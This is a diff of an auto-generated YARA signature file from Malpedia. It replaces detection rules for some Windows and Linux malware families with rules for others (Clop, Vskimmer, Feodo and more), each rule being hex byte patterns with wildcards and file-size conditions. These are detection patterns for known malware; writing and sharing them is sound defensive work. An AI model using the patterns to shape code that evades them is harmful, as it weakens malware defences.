+		logic_hash = "bee47eae17e07c9e5633e3c8b1ddd3c37741eaa6fac55010942faf387fc2a537"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -138807,46 +138526,32 @@ rule MALPEDIA_Win_Badcall_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? b907000000 33c0 8d7c240d }
-		$sequence_1 = { 85c0 754b bf???????? 83c9ff f2ae f7d1 49 }
-		$sequence_2 = { c644240c00 f3ab 66ab 8d4c242c c744240800000000 aa }
-		$sequence_3 = { 8bf1 89742404 8d4e18 e8???????? }
-		$sequence_4 = { 53 57 33db b97f000000 33c0 8dbc2415010000 }
-		$sequence_5 = { 89442412 8bf1 6685ff 66c74424080000 6689442416 746d 6a06 }
-		$sequence_6 = { e8???????? 85c0 7429 8b5604 8d4c240c 51 687e660480 }
-		$sequence_7 = { 56 89442406 57 8b7c241c 8944240e }
-		$sequence_8 = { 8b44242c 85c0 0f848a020000 33c9 48 }
-		$sequence_9 = { 8b742410 8d0c12 57 8bd9 33c0 8bfe 52 }
-		$sequence_10 = { 8b4c2410 85c9 0f849f080000 8bd1 8bcd }
-		$sequence_11 = { c1e902 f3a5 8bc8 8b442468 83e103 }
-		$sequence_12 = { 5f 898834010000 5e 33c0 }
-		$sequence_13 = { 750f 8b4614 85c0 0f87c2feffff 8b442414 8b442410 5f }
-		$sequence_14 = { 899014020000 8b94241c010000 898818020000 8b8c2420010000 89901c020000 }
-		$sequence_15 = { 899518010000 8b542414 85d2 7409 52 }
-		$sequence_16 = { 3bd1 7d06 ebda 3bd1 }
-		$sequence_17 = { 81ec2c010000 55 68???????? ff15???????? }
-		$sequence_18 = { e8???????? 8b442464 6a01 8d4c242c 6a04 51 57 }
-		$sequence_19 = { 5e 85c0 7406 33c0 83c454 c3 }
-		$sequence_20 = { 8bb6a48b0110 eb06 8bb6d88b0110 3bce 7e20 83e907 }
-		$sequence_21 = { 83c40c e9???????? 6a00 6883341200 57 c744242401000000 }
-		$sequence_22 = { 8d7c240d c644240c00 f3ab 8b35???????? 68???????? }
-		$sequence_23 = { 6a00 688f341200 56 e8???????? 83c40c 57 }
+		$sequence_0 = { 83ec0c 8b4c2414 8b442410 56 57 8b7904 8b7004 }
+		$sequence_1 = { 5e 81c418010000 c20400 83ec0c }
+		$sequence_2 = { 83ec10 56 57 8b7c241c 6685ff }
+		$sequence_3 = { 52 e8???????? 33c0 b910000000 89442448 }
+		$sequence_4 = { 5e 83c418 c3 33c9 33c0 8b542424 894c2410 }
+		$sequence_5 = { c3 68ffffff7f 56 ff15???????? 85c0 }
+		$sequence_6 = { 32d0 88143e 46 3bf3 7cea 5f 8d4c2408 }
+		$sequence_7 = { 52 8bce e8???????? 85c0 7413 6a16 8d44241c }
+		$sequence_8 = { e8???????? 50 8bce e8???????? 85c0 0f84da000000 }
+		$sequence_9 = { 5d b801000000 5b 59 c20400 8b4c2410 895910 }
 
 	condition:
-		7 of them and filesize < 483328
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Elf_Satori_Auto : FILE
+rule MALPEDIA_Win_Rumish_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2284f03a-322c-58c3-b1d9-fcae207127e0"
+		id = "db5cf6b1-45f1-5e05-a042-af28c9de660a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.satori_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rumish_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "62c626f34e857ae6d027e483d640bb517fea648ca7b95f5f7c3238608cc58884"
+		logic_hash = "356c30a3a32f94fe03326f490efe36bc56d49a42cedcdbc6774c882ef857a8dc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138860,32 +138565,32 @@ rule MALPEDIA_Elf_Satori_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75f0 83ec0c ebcd 8d65f8 5b 5e }
-		$sequence_1 = { c7411849260508 eb28 83f83e 7509 c7411851260508 eb1a 83f82a }
-		$sequence_2 = { 50 e8???????? 83c410 eb22 50 55 }
-		$sequence_3 = { 894304 e8???????? a1???????? 66897308 c7430c00000000 c6430aff 89580c }
-		$sequence_4 = { 0fb7c0 894704 8b441108 66c1c808 }
-		$sequence_5 = { e9???????? 0fbe19 b800000080 41 c744240801000000 eb12 }
-		$sequence_6 = { e8???????? 89e8 c7851c040000ffffffff e8???????? 83c410 e9???????? }
-		$sequence_7 = { 80cc08 50 6a04 ff35???????? e8???????? 8d842468090000 }
-		$sequence_8 = { 41 eb9b 85ed 790f }
-		$sequence_9 = { 83c410 807b021f 742c 8d143b 8a02 3cfd 7404 }
+		$sequence_0 = { 8908 8b4a04 894804 8b5208 895008 ebd7 5d }
+		$sequence_1 = { c7854cffffff00000000 53 51 52 33c0 0fa2 }
+		$sequence_2 = { 8b55e4 83ea01 3955a4 7d54 8b45a4 }
+		$sequence_3 = { e8???????? 89851cfdffff db851cfdffff dc0d???????? dc35???????? dc05???????? }
+		$sequence_4 = { 0f87c5000000 8b9524fbffff ff2495c0214100 68???????? 8d8dc0fbffff e8???????? }
+		$sequence_5 = { db8590f6ffff d9e8 dec9 d99d8cf6ffff d9858cf6ffff 51 d91c24 }
+		$sequence_6 = { c745fcffffffff 8d4dc0 e8???????? 8b852cfdffff e9???????? e8???????? 898508fdffff }
+		$sequence_7 = { ff15???????? 8b95a0fdffff 89956cfdffff c785b0fdffff00000000 c78544fdffff00000000 eb0f 8b8544fdffff }
+		$sequence_8 = { d99d54ffffff d98554ffffff 51 d91c24 e8???????? 83c404 dc1d???????? }
+		$sequence_9 = { 894de4 8b45e4 c700???????? 8b4de4 c7410400000000 8b55e4 c7420800000000 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 770048
 }
-rule MALPEDIA_Win_Gamotrol_Auto : FILE
+rule MALPEDIA_Win_Vskimmer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2b2204da-4f22-547c-9de3-80e2483d6d42"
+		id = "d60a06ab-73b2-5007-b9fd-d7fdf53f6d46"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gamotrol_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vskimmer_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "0a158c049548339723eb169f446010e4bcdbd33e0805ca045362a8d262920ab1"
+		logic_hash = "fbde08601554269a17787c3ffa7dabc4bf8a82c0fe588e8a82f4a23b193dab38"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138899,32 +138604,32 @@ rule MALPEDIA_Win_Gamotrol_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 90 55 90 }
-		$sequence_1 = { eb82 55 8bec 83ec20 56 33f6 39750c }
-		$sequence_2 = { 83c40b 83ec0b 68b4c2ffff 83c410 83c4f0 6aff 68???????? }
-		$sequence_3 = { c1c804 8945fc 61 8b45f4 }
-		$sequence_4 = { 83ec0b 83c40f 83c4f1 83c45b 83ec5b 90 90 }
-		$sequence_5 = { cc 8b442404 a3???????? c3 8b442404 a3???????? a3???????? }
-		$sequence_6 = { 5d 85c0 7709 33c0 5f 5e }
-		$sequence_7 = { 8945e4 90 90 55 8bec }
-		$sequence_8 = { 81ec00020000 8d6c24fc a1???????? 33c5 898500020000 6a0c b8???????? }
-		$sequence_9 = { 6aff 6a00 68???????? 6a00 ff15???????? }
+		$sequence_0 = { 0fb74624 6685c0 7413 50 ff75fc 8d8f2c020000 }
+		$sequence_1 = { 8d8dd4f7ffff e8???????? 83bdccf7ffff10 8b85b8f7ffff c645fc11 7306 }
+		$sequence_2 = { 7629 8d7e04 ff75e8 ff37 ff15???????? 85c0 }
+		$sequence_3 = { c645fc0a ff15???????? 3bc7 0f8eeb030000 bb???????? be???????? 8d85f0f7ffff }
+		$sequence_4 = { 8b8324020000 8bc8 81e101010000 83f901 0f84e1020000 }
+		$sequence_5 = { 3b8314020000 0f84cc010000 56 8bcb }
+		$sequence_6 = { e8???????? 83c418 8d85b4feffff 50 8d8d88f6ffff }
+		$sequence_7 = { 8d85ecfeffff 68???????? 50 e8???????? ffb5c4f8ffff 8d85ecfeffff }
+		$sequence_8 = { 33c0 8945f0 394510 7417 c706???????? c74610c4d54100 }
+		$sequence_9 = { 59 c3 8bff 55 8bec 51 f6430c40 }
 
 	condition:
 		7 of them and filesize < 376832
 }
-rule MALPEDIA_Win_Protonbot_Auto : FILE
+rule MALPEDIA_Win_Goggles_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2a60cbb5-df76-51a1-aa18-1e35bc0d84b0"
+		id = "040bb693-a4be-548d-a501-6f2900be4db7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.protonbot_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.goggles_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "dd56b01eb6c4f05df12eaa91d84ffe14ac197bb00fbf288295bd9f5385f33352"
+		logic_hash = "2057c3d81d740df16e7462115b1eb3ac99d3eec33754199313bf18b2c821d705"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138938,32 +138643,32 @@ rule MALPEDIA_Win_Protonbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? ffb5f4feffff ff15???????? 8d8dfcfeffff }
-		$sequence_1 = { ffd3 85ff 8bbdf4fffeff 7f8d 5e }
-		$sequence_2 = { 51 52 8d8da4feffff e8???????? 6a00 6aff 6a00 }
-		$sequence_3 = { 83bda0feffff10 8d8d8cfeffff 56 0f438d8cfeffff 6a00 51 6a00 }
-		$sequence_4 = { 6a00 8b18 899df8fffeff e8???????? 83c410 }
-		$sequence_5 = { ff7508 e8???????? 83c410 5d c3 6a1c b8???????? }
-		$sequence_6 = { 57 50 8d45f4 64a300000000 8d8dbcfeffff e8???????? }
-		$sequence_7 = { 837e1410 8955a0 8bc6 7202 8b06 8d1438 8b45a0 }
-		$sequence_8 = { e8???????? 83c418 c645fc01 8d85bcfeffff }
-		$sequence_9 = { ff15???????? 56 85c0 7404 ffd7 eb02 ffd3 }
+		$sequence_0 = { 6a00 8d842488010000 6a00 50 ff15???????? }
+		$sequence_1 = { 52 68???????? ff15???????? 8a542b01 }
+		$sequence_2 = { 68???????? e8???????? 83c410 c680a841001000 8d842410010000 }
+		$sequence_3 = { 8a8010400010 88441efe 8a4c2fff 83e13f 4a 8a8110400010 88441eff }
+		$sequence_4 = { 0f8559ffffff 8b442414 83f803 756e 0fbe0437 }
+		$sequence_5 = { 33f6 894c240c 85c9 7e6f 8b4c2418 8bc2 2bc1 }
+		$sequence_6 = { 0fbe043e 50 68???????? ff15???????? b9???????? 2ac1 c0e002 }
+		$sequence_7 = { 55 57 88442410 b940000000 33c0 8d7c2411 }
+		$sequence_8 = { 8a4c2ffe c1f806 83e10f 83e003 c1e102 0bc1 8a8010400010 }
+		$sequence_9 = { 0fbe8288410010 50 68???????? ff15???????? }
 
 	condition:
-		7 of them and filesize < 1073152
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Mgbot_Auto : FILE
+rule MALPEDIA_Win_Clop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dd03dc94-bb3a-5cad-8f13-4bbe4b7f90a6"
+		id = "4854a8b5-e52e-5b4e-a6a6-3c1168d9d798"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mgbot_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.clop_auto.yar#L1-L181"
 		license_url = "N/A"
-		logic_hash = "7310ce51cc81391fc78e9881bf8f490b2a783d4789728f7661df3e6bdca512d7"
+		logic_hash = "65d38e339958842c1ae82c8f06911cc6fa67bb1b5d7a3308dc697dc71c286d31"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138977,32 +138682,39 @@ rule MALPEDIA_Win_Mgbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8be5 5d c20800 6808020000 e8???????? }
-		$sequence_1 = { 6808020000 e8???????? 6804010000 8bf0 }
-		$sequence_2 = { 5d c20800 6808020000 e8???????? }
-		$sequence_3 = { 6808020000 e8???????? 6804010000 8bf0 6a00 56 e8???????? }
-		$sequence_4 = { 5b 8be5 5d c20800 6808020000 }
-		$sequence_5 = { 6808020000 e8???????? 6804010000 8bf0 6a00 }
-		$sequence_6 = { 0f8553ffffff 5f 33c0 5e }
-		$sequence_7 = { 8be5 5d c20800 6808020000 }
-		$sequence_8 = { 6808020000 e8???????? 6804010000 8bf0 6a00 56 }
-		$sequence_9 = { 5b 8be5 5d c20800 6808020000 e8???????? }
+		$sequence_0 = { 6a04 6800300000 6887000000 6a00 }
+		$sequence_1 = { 83c40c 6860070000 6a40 ff15???????? }
+		$sequence_2 = { 57 6a00 ff15???????? 68???????? 8bd8 }
+		$sequence_3 = { ff15???????? 8bf0 56 53 ff15???????? 50 ff15???????? }
+		$sequence_4 = { 50 ff15???????? 56 53 8bf8 }
+		$sequence_5 = { 53 8bf8 ff15???????? 8bf0 56 6a40 }
+		$sequence_6 = { 668b0424 6683e07f 6683f87f 8d642408 0f85fd0b0000 eb00 f30f7e442404 }
+		$sequence_7 = { 50 ff15???????? 83c40c 6860070000 }
+		$sequence_8 = { 03d1 0fb6ca 8b55fc 0fb60c01 300c17 47 8a550b }
+		$sequence_9 = { 8ab800010000 8a9001010000 57 33ff 8975f8 85f6 744e }
+		$sequence_10 = { 744e fec7 0fb6f7 8a1c06 02d3 88550b 0fb6d2 }
+		$sequence_11 = { 47 8a550b 3b7df8 72c7 5f 8aca 88b800010000 }
+		$sequence_12 = { ffd0 c3 8bff 55 8bec 83ec1c 8d4de4 }
+		$sequence_13 = { 8d85bcefffff 50 ff15???????? 68???????? }
+		$sequence_14 = { 68???????? 68???????? e8???????? 83c424 6aff }
+		$sequence_15 = { ff15???????? 68???????? 8d85dcf7ffff 50 }
+		$sequence_16 = { 6a00 e8???????? 83c408 6aff ff15???????? 33c0 }
 
 	condition:
-		7 of them and filesize < 1677312
+		7 of them and filesize < 796672
 }
-rule MALPEDIA_Win_Lightlesscan_Auto : FILE
+rule MALPEDIA_Win_Webc2_Greencat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b826b58a-58c7-58d3-8203-4697848cdc57"
+		id = "c501ff13-71e5-5a46-9388-bd1d1013ee63"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightlesscan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lightlesscan_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_greencat_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "5d3e853bb474af272be8c5d451244aad6d1bade1283c3318141a0ba65106022e"
+		logic_hash = "4d09295114ba5dc3575e8f0ceeceef8f83e2061d012afdc45a6be16a472e1786"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139016,32 +138728,32 @@ rule MALPEDIA_Win_Lightlesscan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83fb02 0f8539020000 33c0 4585ed 0f84bb010000 448b442464 488945b0 }
-		$sequence_1 = { 4885db 745a 488d0dda770400 e8???????? 4c8d4c2450 458bc4 488bd6 }
-		$sequence_2 = { 4c8d4c2478 4533c0 418d5001 488b4d28 ffd0 }
-		$sequence_3 = { 8b442434 eb8c 85c0 0f858c060000 33db 4d8be7 8bfb }
-		$sequence_4 = { e8???????? 488d4c2454 4c89642428 48894c2420 488b4c2458 4533c9 4533c0 }
-		$sequence_5 = { b904010000 498bc3 66443938 740b 4883c002 48ffc9 75f1 }
-		$sequence_6 = { 4883c9ff 48897c2430 33c0 488bfb 488bd6 f2ae 48f7d1 }
-		$sequence_7 = { e8???????? 488bcb ffd0 488b0d???????? 488b1d???????? c60107 40382b }
-		$sequence_8 = { 4c8d8de0030000 4c8d05306f0500 440fb7d8 488d8dd0010000 ba04010000 44895c2420 e8???????? }
-		$sequence_9 = { 498be3 415c 5f 5d c3 48895c2418 48896c2420 }
+		$sequence_0 = { 59 0f85ab000000 bf28010000 8d85c0fdffff 57 53 }
+		$sequence_1 = { 50 e8???????? 53 50 894614 }
+		$sequence_2 = { 8d4dac ff750c e8???????? 85c0 7511 6830750000 }
+		$sequence_3 = { 53 ff15???????? 55 e8???????? 3bf3 59 7407 }
+		$sequence_4 = { e9???????? 8d45ac 50 ff750c e8???????? e9???????? 8b4508 }
+		$sequence_5 = { 58 e9???????? 56 be00010000 57 56 e8???????? }
+		$sequence_6 = { 5a 8b7508 668950f8 8950fc 668910 66895802 66895804 }
+		$sequence_7 = { 8d0c30 03c6 2945ec 03d9 85f6 75ac 3975fc }
+		$sequence_8 = { ff15???????? 83f8ff 8945ec 7411 ff15???????? 3db7000000 0f84de010000 }
+		$sequence_9 = { 50 ff15???????? 3bc7 59 7405 a3???????? 8a45ff }
 
 	condition:
-		7 of them and filesize < 1399808
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Ondritols_Auto : FILE
+rule MALPEDIA_Win_Pipemagic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "81710fe6-9ae7-546c-9cb9-b9c86df2ce65"
+		id = "fdb60c65-afb1-53e4-9d93-0cc68c23b592"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ondritols"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ondritols_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipemagic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pipemagic_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "44ff18d30e7336ef39e54fec8b0b622a69d795c9c1893d07882cb3b4d93aa6f9"
+		logic_hash = "1b197c324b04c72fd062b82fb8bf23069786730f7c016ad9418e03227253d020"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139055,32 +138767,32 @@ rule MALPEDIA_Win_Ondritols_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f3ab 59 894df8 8b4df8 e8???????? 50 8b45f8 }
-		$sequence_1 = { c745fcffffffff 8d4d10 e8???????? 8a8523ffffff eb1e eb9c c6852fffffff01 }
-		$sequence_2 = { c745fc00000000 8b4508 c1f805 8b4d08 83e11f c1e106 8b1485e0ca4600 }
-		$sequence_3 = { 50 8d45f4 64a300000000 894dec 6a01 8d8518ffffff }
-		$sequence_4 = { 7409 8b55e4 c70201000000 eb15 c745e400000000 c745f000000000 c745e848a54600 }
-		$sequence_5 = { 895f14 895f18 39b530ffffff 720f 8b951cffffff 52 e8???????? }
-		$sequence_6 = { e8???????? 8b45e4 50 e8???????? 83c408 885dfc 8d7310 }
-		$sequence_7 = { 746a 833d????????10 720e a1???????? 50 e8???????? 83c404 }
-		$sequence_8 = { c645fc04 e8???????? 83c404 3bc3 0f84a7020000 8906 }
-		$sequence_9 = { 8d8568f5ffff 50 e8???????? 83c404 83c00b 83f83c }
+		$sequence_0 = { ff15???????? 8bcf e8???????? 8bc8 85c9 7510 53 }
+		$sequence_1 = { ff15???????? 59 c7431003000000 5f 5e 5b c9 }
+		$sequence_2 = { 0f8722010000 8b513c 03d1 8955f8 8d82f8000000 3bc3 0f870c010000 }
+		$sequence_3 = { 8945e4 85db 0f8499020000 8b5508 8a01 }
+		$sequence_4 = { e8???????? a1???????? 33c9 894dd8 }
+		$sequence_5 = { 8b00 eb03 8b4508 6a04 }
+		$sequence_6 = { 59 51 8b4dec 57 e8???????? 57 }
+		$sequence_7 = { 83e801 7404 32c0 eb23 e8???????? eb1a e8???????? }
+		$sequence_8 = { 8d542410 8bce e8???????? e9???????? 83f803 750e }
+		$sequence_9 = { 7404 8b38 eb03 8b7dfc 807e0c00 7530 53 }
 
 	condition:
-		7 of them and filesize < 964608
+		7 of them and filesize < 87040
 }
-rule MALPEDIA_Win_Duuzer_Auto : FILE
+rule MALPEDIA_Win_Apocalipto_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ce410d90-c1fc-5e24-b6fe-acbef7b75a62"
+		id = "040d40e4-215e-5fc8-9173-5081c16b8126"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.duuzer_auto.yar#L1-L150"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.apocalipto_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "dfa72f297db77226dddcb2a3a6d903c9c88217f92848aed80d0a5daab8159948"
+		logic_hash = "59ef34dc3f2d1dbdb1e3d7de19e14bb33faf50cd3fbb7faa9fac9e36e92697d7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139094,37 +138806,32 @@ rule MALPEDIA_Win_Duuzer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f804 7408 83c8ff e9???????? }
-		$sequence_1 = { 5e c3 397170 74e4 83b9f800000008 48895c2458 }
-		$sequence_2 = { c78598fdffff288c3a55 c7859cfdffff83a89c49 c785a0fdffff9ace29e0 c785a4fdffff5652b72b }
-		$sequence_3 = { b8a2000000 5e 8b4dfc 33cd }
-		$sequence_4 = { 5f c3 4585ff 74d9 4489a70c170000 }
-		$sequence_5 = { c785f0fefeff20964000 c785f4fefeff40964000 c785f8fefeff60964000 c785fcfefeff80964000 c78500fffeffd0964000 }
-		$sequence_6 = { 5f 5d c3 488d0529230100 }
-		$sequence_7 = { 51 56 e8???????? 6a78 8d4de8 }
-		$sequence_8 = { ffd6 a3???????? 85c0 7413 8d8509ffffff }
-		$sequence_9 = { 8d86a4000000 c7465000000100 89464c 837dfc00 752f }
-		$sequence_10 = { 5f 5e 5d c3 488d542470 8bcb }
-		$sequence_11 = { 5e c3 488b4e38 48895c2468 }
-		$sequence_12 = { 5f c3 4585f6 74db }
-		$sequence_13 = { 50 8d0c1e 51 52 }
-		$sequence_14 = { 5f 5d 5b c3 33c9 4c897c2460 }
+		$sequence_0 = { 83ec48 c745f400000000 8d45f4 89442410 c744240c1c000000 8d45d8 }
+		$sequence_1 = { 85c0 0f8433090000 c7442404???????? 891c24 }
+		$sequence_2 = { 745f 31db 6690 43 }
+		$sequence_3 = { 31c0 85ff 75d9 8945f0 31db 31c9 }
+		$sequence_4 = { 0500100000 8985d0f3ffff c744240c04000000 c744240800100000 89442404 }
+		$sequence_5 = { c744241800000000 c744241404000000 c744241000000000 c744240c00000000 c744240800000000 8b5508 }
+		$sequence_6 = { e9???????? ff15???????? 89c6 c705????????01000000 c7442404???????? 890424 e8???????? }
+		$sequence_7 = { 890424 ff15???????? 50 c744240800400000 895c2404 }
+		$sequence_8 = { 8974bb08 41 81f900010000 75cf c7430400000000 c70300000000 }
+		$sequence_9 = { a3???????? 85c0 0f84510a0000 c7442404???????? 891c24 ff15???????? 83ec08 }
 
 	condition:
-		7 of them and filesize < 491520
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Herpes_Auto : FILE
+rule MALPEDIA_Win_Unidentified_076_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e63d0f33-775b-5606-bd1d-23c306bf37e3"
+		id = "320fec8e-f3fe-5339-a2f9-df370980c853"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.herpes_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_076"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_076_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "754c79a3fce60a65d5238f8bbab4a5de6f5328cd0831b8e3c8484725e4b748a5"
+		logic_hash = "d906c6adbfb453b72e8affe711020332823b8e590c569caecb0bdba54a063334"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139138,32 +138845,32 @@ rule MALPEDIA_Win_Herpes_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3945cc 8b45b8 7303 8d45b8 56 51 50 }
-		$sequence_1 = { 68???????? e8???????? 83c404 5e 5d c20400 83ff75 }
-		$sequence_2 = { 8945e4 3d01010000 7d0d 8a4c181c 8888c0c24100 40 }
-		$sequence_3 = { 8d45d4 3bc7 7450 3975e8 720c 8b4dd4 51 }
-		$sequence_4 = { ffd7 68???????? 898664010000 ffd5 68???????? 50 898600020000 }
-		$sequence_5 = { e8???????? 8bc7 5f c20400 83661000 }
-		$sequence_6 = { ffd6 0145f0 8b75dc 8b45f0 56 ff75e0 03c7 }
-		$sequence_7 = { ffd7 68???????? ffb6f8010000 894664 }
-		$sequence_8 = { 8b4dfc 898134050000 6a00 6880000000 6a03 6a00 6a01 }
-		$sequence_9 = { 33db 58 89863c020000 899e38020000 }
+		$sequence_0 = { 0f95c3 488b6c2438 488b742440 488b7c2448 8bc3 488b5c2430 4883c420 }
+		$sequence_1 = { 85c0 7f2d 488b86c8000000 33db ff9050010000 41b8fe010000 488bce }
+		$sequence_2 = { 4155 4156 4881ec20010000 488b81c8000000 488bd9 488bf2 488d4c2440 }
+		$sequence_3 = { 498bcc ff9020070000 488b8e50020000 488b96c8000000 4963c6 4869d814030000 }
+		$sequence_4 = { 03d0 41ffc9 75f0 443bda 0f8524010000 44895f30 896f34 }
+		$sequence_5 = { 41b900008000 ba0e660000 4c89742420 ff9080050000 85c0 7522 488b87c8000000 }
+		$sequence_6 = { ffc1 448bf2 483bc8 0f86b2000000 bf08000000 eb03 4803ff }
+		$sequence_7 = { 488b81c8000000 498bc8 ff9080000000 33c9 33d2 4c63c0 85c0 }
+		$sequence_8 = { 488bcb 448d4202 e8???????? 488b93c8000000 488d4df0 ff92f0070000 83a3c802000000 }
+		$sequence_9 = { 0fb74603 440fb6c0 c1e808 41c1e008 440bc0 41833e00 44894530 }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Nettraveler_Auto : FILE
+rule MALPEDIA_Win_Feodo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "49924387-14f0-5a87-ae2b-48062b6b59c8"
+		id = "294edd8e-79e5-57c8-8d21-3a46810574e0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler"
